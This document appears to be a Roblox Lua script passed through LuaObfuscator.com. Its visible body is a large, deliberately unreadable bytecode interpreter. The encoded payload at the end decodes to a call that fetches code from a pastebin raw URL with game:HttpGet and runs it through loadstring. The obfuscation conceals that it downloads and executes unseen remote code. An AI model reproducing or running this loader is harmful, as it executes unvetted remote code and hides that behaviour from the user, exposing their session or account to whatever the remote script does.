--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==((933 -(857 + 74)) -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=620 -(555 + 64) ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (929 -(214 + 713)) );v19=v19 + 1 + 1 ;return (v34 * (824 -(367 + 201))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=0;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(878 -(282 + 595))) then v38=1638 -(1523 + (1111 -(915 + 82))) ;v39=(v21(v37,1 + 0 ,20) * (2^(45 -13))) + v36 ;v35=2;end if (0==v35) then v36=v24();v37=v24();v35=1066 -((192 -124) + 997) ;end if (v35==(1272 -(226 + 1044))) then v40=v21(v37,91 -70 ,148 -(32 + 85) );v41=((v21(v37,32)==(1 + 0)) and  -(1 + 0 + (0 -0))) or (958 -(892 + 65)) ;v35=7 -(1191 -(1069 + 118)) ;end if (v35==(5 -2)) then if (v40==0) then if (v39==(0 -0)) then return v41 * (350 -(87 + 263)) ;else v40=181 -(67 + 113) ;v38=0 + (0 -0) ;end elseif (v40==(5025 -2978)) then return ((v39==(0 + 0)) and (v41 * (((6 -3) -(1 + 1))/(952 -(802 + 150))))) or (v41 * NaN) ;end return v8(v41,v40-(2753 -1730) ) * (v38 + (v39/((3 -1)^(38 + 14)))) ;end end end v26=nil;function v26(v42)local v43=0;local v44;local v45;while true do if (v43==(0 -0)) then v44=nil;if  not v42 then v42=v24();if (v42==0) then return "";end end v43=1 + 0 ;end if ((792 -(368 + 423))==v43) then v44=v3(v16,v19,(v19 + v42) -(3 -2) );v19=v19 + v42 ;v43=20 -(5 + 5 + 8) ;end if (v43==(7 -5)) then v45={};for v93=(783 -340) -(416 + 26) , #v44 do v45[v93]=v2(v1(v3(v44,v93,v93)));end v43=3;end if (v43==(9 -6)) then return v6(v45);end end end v18=5;end if (v18==6) then v29=nil;function v29()local v46=0 -0 ;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v46==(2 + 1)) then v53=nil;v54=nil;v46=1231 -(322 + 905) ;end if (v46~=(612 -(602 + 9))) then else v49=nil;v50=nil;v46=1191 -(449 + 740) ;end if (v46~=2) then else v51=nil;v52=nil;v46=1148 -(466 + 679) ;end if (v46==(951 -(245 + 702))) then while true do if (v47==1) then local v99=0 -0 ;while true do if (v99==(1 + 0)) then v47=4 -2 ;break;end if (v99==(440 -(382 + 58))) then v50=nil;v51=nil;v99=3 -2 ;end end end if (v47==(0 + 0)) then local v100=0 -0 ;while true do if (v100~=1) then else v47=2 -1 ;break;end if (v100==(1900 -(106 + 1794))) then v48=0 + 0 ;v49=nil;v100=1 + 0 ;end end end if (v47==3) then v54=nil;while true do local v103=0;while true do if (v103~=(1 -0)) then else if (v48==2) then local v138=0 -0 ;local v139;local v140;while true do if (v138~=(0 -0)) then else v139=0;v140=nil;v138=2 -1 ;end if (v138==(115 -(4 + 110))) then while true do if (v139==(1690 -(1121 + 569))) then v140=584 -(57 + 527) ;while true do if (v140==(1427 -(41 + 1386))) then local v167=683 -(483 + 200) ;while true do if (v167==(1464 -(1404 + 59))) then v140=1;break;end if (v167~=0) then else local v172=103 -(17 + 86) ;while true do if (v172~=(0 + 0)) then else for v180=1 -0 ,v53 do local v181=0 -0 ;local v182;local v183;local v184;local v185;while true do if (v181==(166 -(122 + 44))) then v182=0 -0 ;v183=nil;v181=1;end if (v181==(6 -4)) then while true do if (v182==(1 + 0)) then v185=nil;while true do if (v183~=(1 -0)) then else if (v184==(1 + 0)) then v185=v22()~=0 ;elseif (v184==(3 -1)) then v185=v25();elseif (v184~=3) then else v185=v26();end v54[v180]=v185;break;end if (v183~=0) then else local v208=0;local v209;while true do if (v208==(65 -(30 + 35))) then v209=765 -(468 + 297) ;while true do if (v209==1) then v183=563 -(334 + 228) ;break;end if (v209~=(0 -0)) then else local v212=0 -0 ;while true do if (v212~=0) then else v184=v22();v185=nil;v212=1 + 0 ;end if (v212==1) then v209=1258 -(1043 + 214) ;break;end end end end break;end end end end break;end if (v182~=0) then else v183=0 -0 ;v184=nil;v182=1 + 0 ;end end break;end if (v181==1) then v184=nil;v185=nil;v181=2;end end end v52[239 -(141 + 95) ]=v22();v172=3 -2 ;end if (v172==(1213 -(323 + 889))) then v167=2 -1 ;break;end end end end end if (v140==(581 -(361 + 219))) then for v168=321 -(53 + 267) ,v24() do local v169=0 -0 ;local v170;local v171;while true do if (v169~=1) then else while true do if (v170==(0 + 0)) then v171=v22();if (v21(v171,414 -(15 + 398) ,983 -(18 + 964) )==(0 -0)) then local v188=0 -0 ;local v189;local v190;local v191;local v192;while true do if (v188~=0) then else local v195=0 + 0 ;while true do if (v195~=(0 + 0)) then else v189=0 + 0 ;v190=nil;v195=851 -(20 + 830) ;end if ((1 + 0)==v195) then v188=1 -0 ;break;end end end if (v188~=(128 -(116 + 10))) then else while true do if (v189~=0) then else local v197=163 -(92 + 71) ;local v198;local v199;while true do if (v197==(0 + 0)) then v198=0;v199=nil;v197=739 -(542 + 196) ;end if (v197==1) then while true do if (v198~=(0 -0)) then else v199=0 + 0 ;while true do if (v199~=(0 + 0)) then else local v213=0;local v214;while true do if (v213~=(0 -0)) then else v214=0 + 0 ;while true do if (v214==(0 + 0)) then v190=v21(v171,128 -(55 + 71) ,3);v191=v21(v171,4,15 -9 );v214=2 -1 ;end if ((1552 -(1126 + 425))==v214) then v199=2 -1 ;break;end end break;end end end if ((1 + 0)~=v199) then else v189=1;break;end end break;end end break;end end end if (v189==(407 -(118 + 287))) then local v200=0 -0 ;local v201;local v202;while true do if (v200~=(940 -(714 + 225))) then else while true do if (0==v201) then v202=1121 -(118 + 1003) ;while true do if ((0 -0)~=v202) then else if (v21(v191,2 -1 ,378 -(142 + 235) )==(4 -3)) then v192[2]=v54[v192[1 + 1 ]];end if (v21(v191,979 -(553 + 424) ,3 -1 )==1) then v192[3 + 0 ]=v54[v192[809 -(118 + 688) ]];end v202=1 + 0 ;end if (v202==(1 + 0)) then v189=2 + 1 ;break;end end break;end end break;end if (v200~=(0 + 0)) then else v201=0 -0 ;v202=nil;v200=2 -1 ;end end end if (v189~=(3 -2)) then else local v203=0 -0 ;local v204;local v205;while true do if (v203==1) then while true do if (v204==(0 + 0)) then v205=0 -0 ;while true do if (v205~=(0 -0)) then else v192={v23(),v23(),nil,nil};if (v190==0) then local v219=0;local v220;local v221;local v222;while true do if ((1329 -(797 + 532))~=v219) then else v220=0;v221=nil;v219=2 -1 ;end if (v219==(286 -(175 + 110))) then v222=nil;while true do if (v220==(0 + 0)) then local v225=0 -0 ;while true do if (v225==(0 + 0)) then v221=1796 -(503 + 1293) ;v222=nil;v225=2 -1 ;end if (v225~=1) then else v220=1203 -(373 + 829) ;break;end end end if (v220~=(732 -(476 + 255))) then else while true do if (v221==(1130 -(369 + 761))) then v222=0 + 0 ;while true do if (v222==0) then v192[1064 -(810 + 251) ]=v23();v192[4]=v23();break;end end break;end end break;end end break;end end elseif (v190==(1 + 0)) then v192[3]=v24();elseif (v190==(2 -0)) then v192[3]=v24() -((2 + 0)^(549 -(43 + 490))) ;elseif (v190~=3) then else local v226=0;local v227;while true do if ((0 -0)~=v226) then else v227=733 -(711 + 22) ;while true do if (v227==(0 -0)) then v192[862 -(240 + 619) ]=v24() -((240 -(64 + 174))^(3 + 13)) ;v192[4]=v23();break;end end break;end end end v205=1 -0 ;end if (v205~=(337 -(144 + 192))) then else v189=218 -(42 + 174) ;break;end end break;end end break;end if (v203==(0 + 0)) then v204=0 + 0 ;v205=nil;v203=1 + 0 ;end end end if (v189~=3) then else if (v21(v191,3,9 -6 )==(1740 -(404 + 1335))) then v192[1508 -(363 + 1141) ]=v54[v192[1584 -(1183 + 397) ]];end v49[v168]=v192;break;end end break;end if (v188~=1) then else local v196=0 -0 ;while true do if (v196==(1 + 0)) then v188=339 -(10 + 327) ;break;end if (v196==(0 + 0)) then v191=nil;v192=nil;v196=1 + 0 ;end end end end end break;end end break;end if ((1975 -(1913 + 62))~=v169) then else local v178=0;while true do if (v178~=(0 + 0)) then else v170=0 + 0 ;v171=nil;v178=2 -1 ;end if (v178==(1934 -(565 + 1368))) then v169=1;break;end end end end end v48=11 -8 ;break;end end break;end end break;end end end if (v48==(1664 -(1477 + 184))) then local v141=0 + 0 ;local v142;while true do if (v141==(0 -0)) then v142=0 -0 ;while true do if (0==v142) then local v161=0;local v162;while true do if ((1493 -(711 + 782))==v161) then v162=0 + 0 ;while true do if ((0 -0)==v162) then local v173=469 -(270 + 199) ;while true do if (v173==(0 + 0)) then for v186=857 -(564 + 292) ,v24() do v50[v186-(2 -1) ]=v29();end return v52;end end end end break;end end end end break;end end end break;end if (v103~=0) then else local v108=0 + 0 ;local v109;while true do if (v108~=0) then else v109=0 -0 ;while true do if (v109~=(2 -1)) then else v103=305 -(244 + 60) ;break;end if ((0 + 0)~=v109) then else if ((0 -0)==v48) then local v163=0;local v164;while true do if (v163==(476 -(41 + 435))) then v164=0;while true do if (v164~=0) then else local v174=0 + 0 ;local v175;while true do if ((1001 -(938 + 63))==v174) then v175=0;while true do if (v175==(1168 -(645 + 522))) then v164=1 + 0 ;break;end if (v175~=0) then else local v193=0 + 0 ;while true do if ((1126 -(936 + 189))==v193) then v175=1;break;end if (v193==(0 + 0)) then v49={};v50={};v193=2 -1 ;end end end end break;end end end if (v164==(1837 -(1045 + 791))) then v51={};v48=2 -1 ;break;end end break;end end end if (v48~=(1614 -(1565 + 48))) then else local v165=0;local v166;while true do if (v165==0) then v166=0 + 0 ;while true do if (v166~=(505 -(351 + 154))) then else local v176=1574 -(1281 + 293) ;local v177;while true do if (v176==(266 -(28 + 238))) then v177=0;while true do if ((1139 -(782 + 356))~=v177) then else v166=1;break;end if ((267 -(176 + 91))==v177) then local v194=0 -0 ;while true do if (v194==(0 -0)) then v52={v49,v50,nil,v51};v53=v24();v194=1 + 0 ;end if (v194~=1) then else v177=3 -2 ;break;end end end end break;end end end if (v166==(1 + 0)) then v54={};v48=6 -4 ;break;end end break;end end end v109=3 -2 ;end end break;end end end end end break;end if (v47~=2) then else local v101=0;local v102;while true do if ((1018 -(697 + 321))~=v101) then else v102=0 -0 ;while true do if (0~=v102) then else local v143=0;while true do if (v143==(0 + 0)) then v52=nil;v53=nil;v143=1 + 0 ;end if (v143~=(1 -0)) then else v102=2 -1 ;break;end end end if (v102~=1) then else v47=3;break;end end break;end end end end break;end if (v46~=0) then else v47=0 + 0 ;v48=nil;v46=1 -0 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55)if (v1(v55,2)==79) then v20=v0(v3(v55,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v55,16));if v20 then local v104=0;local v105;while true do if (v104==1) then return v105;end if (v104==0) then v105=v5(v85,v20);v20=nil;v104=1;end end else return v85;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v56=1784 -(214 + 1570) ;local v57;local v58;local v59;local v60;while true do if (v56==(1455 -(990 + 465))) then v57,v58,v59,v60=v1(v16,v19,v19 + (628 -(512 + 114)) + 1 );v19=v19 + 2 + 2 ;v56=1;end if (v56==(1 + 0)) then return (v60 * (66027239 -49250023)) + (v59 * (170861 -105325)) + (v58 * (1982 -(1668 + 58))) + v57 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v70=v64;local v71=v65;local v72=v66;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v86=0,v78 do if (v86>=v72) then v76[v86-v72 ]=v77[v86 + 1 ];else v80[v86]=v77[v86 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=6) then if (v83<=2) then if (v83<=0) then do return;end elseif (v83>1) then local v110=0;local v111;local v112;local v113;local v114;while true do if (v110==2) then for v157=v111,v75 do local v158=0;while true do if (v158==0) then v114=v114 + 1 ;v80[v157]=v112[v114];break;end end end break;end if (v110==0) then v111=v82[2];v112,v113=v73(v80[v111](v13(v80,v111 + 1 ,v82[3])));v110=1;end if (v110==1) then v75=(v113 + v111) -1 ;v114=0;v110=2;end end else v80[v82[2]]=v63[v82[3]];end elseif (v83<=4) then if (v83==3) then v80[v82[2]]();else local v117=0;local v118;while true do if (v117==0) then v118=v82[2];v80[v118]=v80[v118](v13(v80,v118 + 1 ,v75));break;end end end elseif (v83==5) then local v119=0;local v120;local v121;while true do if (v119==0) then v120=v82[2];v121=v80[v82[3]];v119=1;end if (v119==1) then v80[v120 + 1 ]=v121;v80[v120]=v121[v82[4]];break;end end else v80[v82[2]]=v82[3];end elseif (v83<=9) then if (v83<=7) then local v106=v82[2];v80[v106]=v80[v106](v13(v80,v106 + 1 ,v75));elseif (v83==8) then local v124=0;local v125;local v126;while true do if (v124==0) then v125=v82[2];v126=v80[v82[3]];v124=1;end if (v124==1) then v80[v125 + 1 ]=v126;v80[v125]=v126[v82[4]];break;end end else v80[v82[2]]=v82[3];end elseif (v83<=11) then if (v83==10) then v80[v82[2]]=v63[v82[3]];else local v131=v82[2];local v132,v133=v73(v80[v131](v13(v80,v131 + 1 ,v82[3])));v75=(v133 + v131) -1 ;local v134=0;for v135=v131,v75 do v134=v134 + 1 ;v80[v135]=v132[v134];end end elseif (v83>12) then v80[v82[2]]();else do return;end end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v67,v68,v69)if v69 then local v89=0 -0 ;local v90;while true do if (v89==(0 -0)) then v90=(v67/(2^(v68-1)))%((1 + 1)^(((v69-(1 + (0 -0))) -(v68-(1 + 0))) + (3 -2))) ;return v90-(v90%1) ;end end else local v91=1994 -(109 + 1885) ;local v92;while true do if (v91==((1854 -385) -(1269 + 30 + 170))) then v92=(3 -(1 + 0))^(v68-1) ;return (((v67%(v92 + v92))>=v92) and (816 -(98 + 717))) or (826 -(802 + 24)) ;end end end end v22=nil;v18=2;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F75514477366A5A4100083O0012013O00013O001201000100023O002008000100010003001206000300044O0002000100034O00075O00022O00033O000100012O000C3O00017O00",v9(),...);end
